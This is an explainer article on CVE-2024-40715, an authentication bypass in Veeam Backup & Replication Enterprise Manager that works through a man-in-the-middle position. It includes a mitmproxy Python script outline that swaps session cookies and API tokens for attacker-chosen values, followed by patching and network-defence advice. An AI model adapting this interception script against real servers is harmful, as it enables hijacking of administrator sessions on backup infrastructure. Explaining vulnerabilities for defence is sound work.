CVE-2024-40715 - How MITM Attackers Can Bypass Authentication in Veeam Backup & Replication Enterprise Manager
In June 2024, a new security vulnerability was identified in Veeam Backup & Replication Enterprise Manager (B&R EM), tracked as CVE-2024-40715. Unlike typical software flaws, this vulnerability allows attackers to bypass authentication – but only if they're able to pull off a Man-in-the-Middle (MITM) attack. This article simplifies the technical details, shows you a basic attack scenario, and offers defensive guidance.
What is CVE-2024-40715?
Veeam Backup & Replication Enterprise Manager is used by many organizations to manage backups and restore tasks centrally. In versions affected by CVE-2024-40715, the authentication system can be tricked, letting attackers access admin functions without valid credentials, provided they can intercept and manipulate network traffic between an admin and the server.
Original Advisory
- Veeam Security Advisory VEEAM-SA-2024-013
- NIST National Vulnerability Database - CVE-2024-40715
How the Vulnerability Works
The core issue here is network-based:
- The Enterprise Manager does not verify critical parts of the authentication if certain network-level tricks are performed.
- The flaw can be triggered if someone is able to intercept (MITM) the traffic between the administrator's browser and the Veeam server.
- Attackers can modify or hijack the authentication process, potentially logging in as an administrator without ever entering the password.
Exploit Scenario: A Walkthrough
NOTE: The following content is for educational and defensive purposes only.
Modify Authentication Data:
The attacker tampers with the login request or response. For example, altering tokens or session cookies to escalate privileges.
Example Exploit Snippet
Below is a Python script outline which helps visualize how a MITM attacker could tamper with web traffic, using a tool like mitmproxy. Assume the attacker has already set up interception:
# This script runs as a mitmproxy inline script
def response(flow):
# Check if this is the EM login endpoint
if flow.request.pretty_url.endswith("/EnterpriseManager/login"):
# Try to detect a redirect after successful authentication
if "Set-Cookie" in flow.response.headers:
# Force authentication bypass by injecting own admin session cookie
flow.response.headers["Set-Cookie"] = (
"EM_SessionId=adminsessionexample; Path=/; HttpOnly"
)
print("[+] Injected admin session cookie!")
# Advanced: intercept JSON responses and inject own token
if "/api/" in flow.request.pretty_url and flow.response.headers.get("Content-Type", "") == "application/json":
data = flow.response.json()
if "authToken" in data:
data["authToken"] = "injected_attack_token"
flow.response.text = json.dumps(data)
print("[+] Injected forged token into API response")
This code tells the proxy to replace real session cookies with a fake, attacker-controlled session. In reality, attackers may need to study the exact cookie or token names, but the concept remains the same.
Defenses Against CVE-2024-40715
The attack only works if MITM is possible!
Preventing network interception is your first line of defense.
- Apply the Veeam security patch now.
Conclusion
CVE-2024-40715 is a serious authentication bypass for Veeam B&R Enterprise Manager, but only attackers with MITM capabilities are able to use it. This means network security is just as important as patching the software itself.
Refer to the official Veeam guidance and update immediately, and make sure no one on your network can act as a Man-in-the-Middle.
References
- Veeam Security Advisory VEEAM-SA-2024-013
- NIST NVD CVE-2024-40715
- MITMproxy Documentation
Timeline
Published on: 11/07/2024 17:15:08 UTC
Last modified on: 11/08/2024 19:01:03 UTC